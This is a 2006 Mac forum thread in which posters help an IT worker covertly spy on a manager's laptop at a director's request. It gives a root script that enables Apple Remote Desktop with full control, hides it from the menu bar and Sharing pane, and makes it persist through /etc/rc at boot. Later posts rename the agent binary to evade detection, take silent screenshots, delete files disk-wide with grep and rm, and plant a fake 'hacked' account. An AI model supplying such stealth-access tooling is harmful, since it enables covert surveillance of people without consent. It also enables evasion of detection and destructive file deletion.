The macosxhints Forums

The macosxhints Forums (http://hintsforums.macworld.com/index.php)
-   Applications (http://hintsforums.macworld.com/forumdisplay.php?f=5)
-   -   Grey Question... Hidding Remote Desktop or SSH (http://hintsforums.macworld.com/showthread.php?t=60318)

digitaljunkie 09-05-2006 05:55 AM

Grey Question... Hidding Remote Desktop or SSH
 
OK we have someone at work whom is believed to be "messing" around i.e downloading, chatting and even possibly damaging the companies integrity, whilst in the office.

The problem is they are a Manager that uses that uses a full admin account on their laptop. Because sensitive information may be stored on managerial laptops we don't Remote Desktop or SSH these laptops, if there's an issue we physically sit at the machine.

I have been asked by a Director if I can report at any given point what applications that person has running or what they are doing.
The problem is this person is fairly computer literate and by turning Remote Desktop on and not showing when it is active isn't really inconspicuos enough to gather proof.

Does anyone have any suggestions?

acme.mail.order 09-05-2006 06:56 AM

SSH is completely transparent to the console user, but if he knows it's supposed to be turned off it's really obvious that it's been changed. I've never used ARD, but VNC server is invisible IF it's started from the terminal. I do this regularly at my office (the staff aren't evil, they just don't read instructions) . You can detect VNC from the Terminal easily.

There are several keyloggers and screen capture programs for OSX - start at VersionTracker. Some of them pop up a small window until you pay for them, but the shareware fees shouldn't bankrupt you. How well they hide is an issue. Is he likely to poke around in the background processes?

Intercepting the mail/net traffic too? Don't need anything on his laptop for that.

If I were in your place, I would make it look like his machine had been hacked by a 3rd party - e.g. a hidden account named "0vvn3D" containing either a Star Trek site or gay poяn - something that the observee would never suspect you of. Naturally keep the Directors in the loop.

voldenuit 09-05-2006 07:42 AM

The cleanest approach would be to listen to the traffic via the diagnostics port of the switch, that way you don't even have to touch the machine.

Also be extremely careful to get full cover for what you do (in writing, the whole thing has decent chances of ending up in court one way or the other) and if in doubt about the legality of what you're about to do, consult a lawyer.
The Eichmann defense (they told me to kill them) doesn't work.

Preferably all you do should not only be legal, but also covered by company policy. Finally note that you'd better be on the winning side of this story or you may be looking for a new job real soon...

You should at least consider the possibility that the guy who asked you is trying to frame the manager for stuff that might not be work-related and key loggers and other intrusive tricks can't tell private and company use apart, so this is a really tricky subject.

Perhaps suggest they hire a PI instead, that way you're out of the loop entirely.

digitaljunkie 09-05-2006 07:58 AM

Thanks for all the comments...

Quote:

Originally Posted by voldenuit (Post 319535)
The cleanest approach would be to listen to the traffic via the diagnostics port of the switch,


This does interest me when you say switch do you refer to the router as our switch is a rackmounted netgear 10/100 switch.

The router is a draytek 2800. Which also acts as the DHCP server.

acme.mail.order 09-05-2006 08:06 AM

Quote:

Originally Posted by voldenuit (Post 319535)
Perhaps suggest they hire a PI instead, that way you're out of the loop entirely.

But then he's also out of the brownie-points loop :)

The company lawyer is a good idea. And you said A Director? Singular? How many are there and are they all involved? If this is all legit then the Director shouldn't have any problems sitting down with you and the company lawyer. Record the meeting.

voldenuit 09-05-2006 08:12 AM

Quote:

Originally Posted by acme.mail.order (Post 319538)
But then he's also out of the brownie-points loop :)

Hacking is fun, being involved in machivellian schemes takes folks who can handle it and people skilled to do both well are rare.
It's dangerous and may be ethically and legally very, very borderline if not beyond.
A company lawyer will also place the companies interest before those of digitaljunkie who should make sure to have a very precise understanding of the legal framework for doing this kind of stuff.

Quote:

Originally Posted by digitaljunkie (Post 319537)
This does interest me when you say switch do you refer to the router as our switch is a rackmounted netgear 10/100 switch.

I'm reasonably familiar with networking terminology, so yes, the switch is your target here.

Most rack-mounted models are managed, read the documentation and you'll most probably find some very interesting features for your purpose.

Again, be really careful about politics and legality, it's you, not one of them who's gonna be sued, fired or both.

fenrack 09-05-2006 02:48 PM

the magic script ;)

run with sudo

-----
#!/bin/bash

### start ARD with all privileges for all users
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -ControlObserve -DeleteFiles -TextMessages -OpenQuitApps -RestartShutdown -SendFiles -ChangeSettings -GenerateReports -clientopts -setmenuextra -menuextra no -quiet -agent
### edit /etc/hostconfig so ARD isnt checked in the Sharing pref pane
### badly need some delay here in order for ARD to start correctly and ports 3283 and 5900 to be opened correctly; i have tried with many different values, over 15 seems to be working 100% of the time, made it 20 sec to be sure
sleep 20
sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2
mv /tmp/output2 /etc/hostconfig
### modifying /etc/rc so ARD is started in stealth mode at every boot
sed 's/exit 0//' < /etc/rc > /tmp/output1
echo "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -ControlObserve -DeleteFiles -TextMessages -OpenQuitApps -RestartShutdown -SendFiles -ChangeSettings -GenerateReports -clientopts -setmenuextra -menuextra no -quiet -agent" >> /tmp/output1
echo "sleep 20" >> /tmp/output1
echo "/usr/bin/sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2" >> /tmp/output1
echo "/bin/mv /tmp/output2 /etc/hostconfig" >> /tmp/output1
echo "exit 0" >> /tmp/output1
mv /tmp/output1 /etc/rc

exit 0
------

*cough*
im not responsable for whatever you do with that, educationnal purpose.

hayne 09-05-2006 04:16 PM

Quote:

Originally Posted by fenrack (Post 319618)
the magic script

You forgot to supply the complementary script for the other side:

Code:

#!/bin/sh
# hide what we are doing from snoopy admins
A=A;R=R;D=D;g=g;e=e;n=n;t=t;k=k;i=i;l=l;a=a
while :; do
    ps axww | grep [$A]$R$D$A$g$e$n$t
    if [ $? = 0 ]; then
        echo "$A$R$D$A$g$e$n$t is running"
        echo "About to $k$i$l$l $A$R$D$A$g$e$n$t"
        $k$i$l$l$a$l$l $A$R$D$A$g$e$n$t
    fi

    sleep 60
done


fenrack 09-05-2006 05:03 PM

hayne, let's p-lease not suppose our guy is a shell scripter ;)



PS: Thx for brining the Light side anyway :D

acme.mail.order 09-05-2006 10:54 PM

Quote:

Originally Posted by fenrack (Post 319618)
sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2
mv /tmp/output2 /etc/hostconfig

Small timesaver: (edits the file in place)

perl -pi -e 's/ARDAGENT=-YES-/ARDAGENT=-NO-/' /etc/hostconfig

acme.mail.order 09-05-2006 11:09 PM

Maybe you want to add this to the process, but watch the timing as it will take a while to finish. Should only need to be one once, perhaps at reboot with a Console Message "Optimizing File System" to cover the scanning.

nice -n 20 grep -lr 'kill.*ARDAgent' /* 2> /dev/null | xargs rm

hayne 09-06-2006 01:37 AM

Quote:

Originally Posted by acme.mail.order (Post 319771)
nice -n 20 grep -lr 'kill.*ARDAgent' /* 2> /dev/null | xargs rm

What's the point of that? It would only catch scripts where the scripter didn't use any obfuscation.
:)

acme.mail.order 09-06-2006 01:44 AM

If the guy's smart enough to do that, then we can all go home. He'll notice any monitoring and will be covering his tracks.

hayne 09-06-2006 01:55 AM

Quote:

Originally Posted by acme.mail.order (Post 319797)
If the guy's smart enough to do that, then we can all go home.

He/she doesn't have to be all that smart - e.g. he/she could just copy my script from above.

fenrack 09-06-2006 07:02 AM

Quote:

Originally Posted by acme.mail.order (Post 319767)
Small timesaver: (edits the file in place)

perl -pi -e 's/ARDAGENT=-YES-/ARDAGENT=-NO-/' /etc/hostconfig

omg.. you cant believe how hard i tried to do this
im such a noob lol
thank you a thousand times :)

acme.mail.order 09-06-2006 10:42 AM

Quote:

Originally Posted by hayne (Post 319799)
He/she doesn't have to be all that smart - e.g. he/she could just copy my script from above.

Which you recently changed :rolleyes:

mv ARDAgent smbmount

<substitute any unix-sounding name that isn't being used. Real utilities that aren't used on that box, like `named`, will hide well.>

Then adjust references to ARDAgent to the new name in fenrack's script, /etc/hostconfig and Startup Items. With a small amount of work, you can bury it so deep only forensic analysis will find it. Or a port scanner.

If ARD doesn't like having it's process name changed, VNC Server doesn't care.

acme.mail.order 09-06-2006 10:44 AM

Just discovered this one - secret screen captures from the shell:

screencapture -mx filename.pdf

-m : main monitor; -x : no audio

about 80kb per capture, they would need to be copied off fairly regularly.

fenrack 09-06-2006 07:10 PM

Quote:

Originally Posted by acme.mail.order (Post 319865)
Just discovered this one - secret screen captures from the shell:

screencapture -mx filename.pdf

-m : main monitor; -x : no audio

about 80kb per capture, they would need to be copied off fairly regularly.

make that "screencapture -mx filename.png" for 10.4.x or it wont open (bad PDF header)

digitaljunkie 09-07-2006 07:20 AM

ok ill have a play with those thanks peeps.

I noticed a wireless network thats unprotected and it appears that the person appears to be using that for msn aswell.
Is there anyway to prevent their laptop from joining said specified network without actually locking it down?

voldenuit 09-07-2006 08:07 AM

Yes, but WLAN is even easier to tap than Ethernet, so why would you do that ?

acme.mail.order 09-07-2006 10:02 AM

Find out whose wireless network it is and give them a courtesy call. Bring donuts.

digitaljunkie 09-27-2006 05:29 AM

OK well solution almost fixed we simply had the wireless locked down and made our firewall ruling more strict!

But is there anyway to stop them accessing email through an email client such as mail?

I don't seem to be able to block that kind of access as email all runs on the same protocol (ports).

i.e they may access hotmail through a mail client such as mail, thunderbird, entourage etc etc...

Thanks

acme.mail.order 09-27-2006 05:52 AM

You can block individual hosts/sites through DNS. See the local guru if you are running your own server, or just use the /etc/hosts file:

12.34.56.78 hotmail.com www.hotmail.com

hotmail will go wherever you want it to go ;)

The double listing is there 'cause it's a little narrow-minded about what matches.


All times are GMT -5. The time now is 08:21 AM.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.
Site design © IDG Consumer & SMB; individuals retain copyright of their postings
but consent to the possible use of their material in other areas of IDG Consumer & SMB.